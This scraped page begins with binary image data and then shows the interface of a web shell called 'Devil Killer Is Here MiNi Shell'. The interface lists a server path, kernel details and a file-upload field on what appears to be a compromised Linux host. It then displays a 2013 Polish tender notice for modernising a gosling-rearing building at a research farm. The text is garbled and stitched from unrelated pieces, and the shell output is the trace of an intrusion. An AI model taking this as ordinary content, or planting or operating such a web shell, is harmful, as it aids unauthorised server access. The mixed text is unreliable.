JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130604/98953-N-2013.html

<p class="kh_header"><b>Janikowo: Modernizacja budynku wychowalni gąsiąt (obiekt nr 38) w Zakładzie Doświadczalnym w Kołudzie Wielkiej.</b><br>
<b>Numer ogłoszenia: 98953 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Zootechniki - Państwowy Instytut Badawczy Zakład Doświadczalny Kołuda Wielka , Kołuda Wielka, ul. Parkowa 1, 88-160 Janikowo, woj. kujawsko-pomorskie, tel. 052 351-33-91, faks 052 351-35-41.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka badawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku wychowalni gąsiąt (obiekt nr 38) w Zakładzie Doświadczalnym w Kołudzie Wielkiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na modernizacji
budynku wychowalni gąsiąt. Miejsce wykonywania robót budowlanych :ul. Parkowa 1, Janikowo, Gmina Janikowo. Zakres robót obejmuje w szczególności: Rozbiórki:
- rynien, rur spustowych i obróbek blacharskich dachu,
-podjazdów i opaski betonowej budynki,
-posadzki i podłoża betonowego,
-skucie tynków na ścianach, słupach i stropie,
-wykucia z murów ceglanych okien, nawiewów wentylac., bram i drzwi,zamurowanie i wykucie nowych otworów w ścianach zewnętrznych,
wykonanie nowych tynków wewnętrznych na ścianach, słupach i stropie,
wykonanie nowego podłoża i posadzki betonowej utwardzonej
powierzchniowo, osadzenie nowych okien inwentarskich i ściennych wlotów
powietrza świeżego wraz z ochronnymi osłonami zewnętrznymi, osadzenie w
murze nowych bram i drzwi stalowych, osadzenie w stropodachu nowych
kominów (ciepłych) wentylacji wyciągowej, odtworzenie ścianek
przeponowych z płyt poliwęglanowych, malowanie tynków wewnętrznych,
montaż instalacji i urządzeń grzewczych (nagrzewnice wodne Leo Agro),
montaż systemu zraszania i schładzania powietrza, montaż systemu
urządzeń wentylacji mechanicznej wraz z elektroniką programowania i
sterowania całym systemem wentylacji, ogrzewania i regulacji wilgotności
powietrza wewnętrznego, wykonanie nowej instalacji elektronicznej
oświetlenia i zasilania urządzeń wentylacji, regulacji wilgotności powietrza,
ogrzewania i systemu automatycznej regulacji, docieplenie ścian i
stropodachu wraz z wykonaniem nowego pokrycia dachowego, wykonanie
nowych podjazdów z kostki brukowej oraz betonowej opaski budynku,
wykonanie zewnętrznych wybiegów o nawierzchni betonowej. Szczegółowe warunki umowy o roboty budowlane oraz zakres robót określają:
umowa, której wzór stanowi Załącznik nr 1  oraz kosztorys ofertowy z
przedmiarem robót budowlanych stanowiący Załącznik nr 7 ,
Specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiąca
Załącznik nr 8 . Jednocześnie treść tych załączników zawiera istotne dla
stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w
sprawie zamówienia publicznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.32.40-7, 45.11.13.00-1, 45.11.12.00-0, 45.26.23.00-4, 45.26.25.00-6, 45.41.00.00-4, 45.43.22.00-4, 45.44.21.00-8, 45.26.12.10-9, 45.44.30.00-4, 45.33.00.00-9, 45.33.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składając ofertę wykonawca obowiązany będzie zabezpieczyć ofertę wadium w
następującej wysokości: 33.402,00 zł.
2. Wadium może być wniesione w następujących formach:
1) w pieniądzu,
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy
oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze
poręczeniem pieniężnym,
3) w gwarancjach bankowych,
4) w gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5
pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji
Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr
116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
3. Wadium w pieniądzu wnosi się przed upływem terminu składania ofert na
rachunek bankowy Zamawiającego:
36 2030 0045 1110 0000 0066 8660, BGŻ S.A. Oddział Inowrocław
4. Wadium wniesione w formie innej niż pieniężna musi posiadać ważność co
najmniej do końca terminu związania Wykonawcy złożoną przez niego ofertą.
5. Wadium złożone w formie innej niż pieniężna musi obejmować
odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w uPZP. Gwarancja bankowa lub ubezpieczeniowa
powinna być nieodwołalna i bezwarunkowa oraz płatna na pierwsze żądanie.
6. Wadium złożone w innej formie niż pieniężna, należy załączyć do oferty w
oddzielnej kopercie z dopiskiem wadium
7. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem
wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z
zastrzeżeniem normy art. 46 ust. 4a uPZP. Zamawiający zwraca niezwłocznie
wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu
składania ofert.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie
zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania
umowy, jeżeli jego wniesienia żądano.
9. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono
przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego
oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany
przez wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana
1) odmówił podpisania umowy w sprawie zamówienia publicznego na
warunkach określonych w ofercie
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z
przyczyn leżących po stronie wykonawcy.
11. Za zgodą Wykonawcy wadium wniesione w pieniądzu może zostać zaliczone na poczet zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział
Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub
czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
tj. są uprawnieni do uczestnictwa w obrocie prawnym na podstawie
odrębnych przepisów,
2) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na
podstawie art. 24 uPZP. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy,
którzy:
1) posiadają wymaganą wiedzę i doświadczenie, tj. w ciągu pięciu lat wykonali
roboty budowlane w zakresie budowy lub modernizacji przynajmniej trzech budynków inwentarskich do hodowli drobiu wodnego (gęsi, kaczki itp.), a w
tym przynajmniej budowy jednego w pełnym zakresie branż podstawowych
(budowlana, instalacyjna i elektryczna) o kubaturze min. 3.000 m3 lub
wartości robót min. 1,5 mln zł brutto, a należyte wykonanie tych umów
zostało potwierdzone referencjami.Dokumenty wymagane w celu potwierdzenia
spełniania warunków udziału w postępowaniu określonych w pkt. V.2) 
1) Oświadczenie o spełnianiu przez Wykonawcę warunków określonych w pkt.
V.2 (wzór ujęty w załączniku nr 4 ).
2) Wykazu robót budowlanych spełniających wymogi stawiane w pkt V.2. 
(wzór ujęty w załączniku nr 6  wraz z potwierdzeniem należytego
wykonania przez Wykonawcę tych umów (referencje).Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W
postępowaniu mogą wziąć udział Wykonawcy, którzy dysponują niezbędnym
potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj.
1) dysponują osobami posiadającymi wymagane uprawnienia budowlane
wynikające z postanowień ustawy z dnia 7 lipca 1994 r. - Prawo budowlane
(tekst jednolity: Dz. U. z 2010 r. Nr 75, poz. 474 z późn. zm.)zgodnie z
rozporządzeniem Ministra Infrastruktury z dn. 12 kwietnia 2002r. w sprawie
warunków technicznych jakim powinny odpowiadać budynki i ich
usytuowanie (Dz.U. nr 75, poz.. 690- z późn. zm.) (wymagane minimum -
osoba z min. 5 letnim doświadczeniem z uprawnieniami budowlanymi)Dokumenty wymagane w celu potwierdzenia spełniania warunków udziału w
postępowaniu określonych w pkt. V.3:
Oświadczenie o spełnianiu przez Wykonawcę warunków określonych w pkt. V.3
 (wzór ujęty w załączniku nr 4 ).Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział
Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub
czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
tj. są uprawnieni do uczestnictwa w obrocie prawnym na podstawie
odrębnych przepisów,
2) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na
podstawie art. 24 uPZP.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział
Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej
zapewniającej wykonanie zamówienia, tj.:
1) posiadają środki finansowe na rachunku bankowym lub zdolność kredytową
co najmniej w wysokości ceny oferty złożonej w ramach niniejszego
postępowania,
2) są objęci ochroną ubezpieczeniową w ramach ubezpieczenia
odpowiedzialności cywilnej z tytułu prowadzonej działalności i posiadanego
mienia, a poziom tej ochrony powinien spełnia co najmniej poniższe wymogi:
a) przedmiot ubezpieczenia - obejmuje m.in. działalność gospodarczą
polegającą na realizacji robót budowlanych (przedsiębiorstwo budowlane),
b) zakres ubezpieczenia: szkody osobowe i rzeczowe będące następstwem
czynów niedozwolonych (odpowiedzialność deliktowa) oraz wynikające z
niewykonania lub nienależytego wykonania zobowiązania
(odpowiedzialność kontraktowa),
c) suma gwarancyjna - nie niższa niż 2 000 000 zł na jedno i wszystkie
zdarzenia w okresie ubezpieczenia,
d) okres ubezpieczenia - co najmniej od upływu terminu składania ofert do
planowego dnia zakończenia realizacji inwestycji. Jeżeli polisa ekspiruje w
okresie realizacji inwestycji wykonawca jest zobowiązany do odnowienia
ochrony ubezpieczeniowej co najmniej na warunkach dotychczasowych
oraz przekazania zamawiającemu uwierzytelnionej kopii dokumentu
ubezpieczenia bez uprzedniego wezwania najpóźniej w dniu ekspiracji
polisy dotychczasowej.Dokumenty wymagane w celu
potwierdzenia spełniania warunków udziału w postępowaniu określonych w pkt.
V.4 :
1) Oświadczenie o spełnianiu przez Wykonawcę warunków określonych w pkt.
V.4  (wzór ujęty w załączniku nr 4 ).
2) Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej
potwierdzająca wysokość posiadanych środków finansowych lub zdolność
kredytową wykonawcy, zgodnie z pkt V.4.1. , wystawiona nie wcześniej
niż 3 miesiące przed upływem terminu składania ofert albo składania
wniosków o dopuszczenie do udziału w postępowaniu o udzielenie
zamówienia;
3) Dokument potwierdzający objęcie wykonawcy ochroną ubezpieczeniową w
ramach ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej
działalności i posiadanego mienia o poziomie ochrony nie niższym niż
określony w pkt V.4.2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty składające się na ofertę:
1) Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu,
wskazane w ogłoszeniu o zamówieniu oraz w pkt. VI.
2) Wypełniony Formularz Oferty stanowiący załącznik nr 2.
3) Wypełniony kosztorys ofertowy (odpowiednik załącznika nr 7 do SIWZ z
wypełnionymi rubrykami o charakterze cenotwórczym - Cena, R, M, S).
4) Dowód wniesienia wadium.
5) Stosowne pełnomocnictwo do reprezentowania wykonawcy w przetargu
udzielone dla osoby/osób podpisującej ofertę i wymagane oświadczenia, o
ile osoba/osoby składająca i podpisująca ofertę nie jest ujawniona w
wypisie z Krajowego Rejestru Sądowego / wypisie z ewidencji działalności
gospodarczej prowadzonej przez właściwego miejscowo
wójta/burmistrza/prezydenta (proponowany wzór pełnomocnictwa stanowi
załącznik nr 5 ).
6) Wszystkie dodatkowe informacje dotyczące przedmiotu, sposobu,
warunków i zasad ubezpieczenia należy przedstawić w dodatkowym (-ych)
załączniku (-kach) do Formularza Oferty, o ile nie można ich wskazać w
formularzu ofertowym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia umowy zawartej w wyniku przeprowadzenia niniejszego
postępowania o udzielenie zamówienia publicznego mogą zostać zmienione w
przypadku:
1. zmiany przepisów prawa;
2. zmiany terminu realizacji umowy wywołanej niekorzystnymi warunkami
atmosferycznym lub przerwami w realizacji robót spowodowanymi przez
Zamawiającego - niezależnych od Wykonawcy,
3. udokumentowanego opóźnienia Zamawiającego we wprowadzeniu Wykonawcy
na miejsce wykonania robót objętych umową,
4. ograniczenia zakresu robót i zmiany wynagrodzenia o wartość robót
wyłączonych,
5. zaistnienia konieczności wykonania robót dodatkowych, których pomimo
dogłębnej analizy projektu nie można było przewidzieć na etapie przygotowania
postępowania i złożenia oferty, a ich wykonanie jest niezbędne dla prawidłowej
realizacji robót w ramach niniejszego zamówienia;
Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron
wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
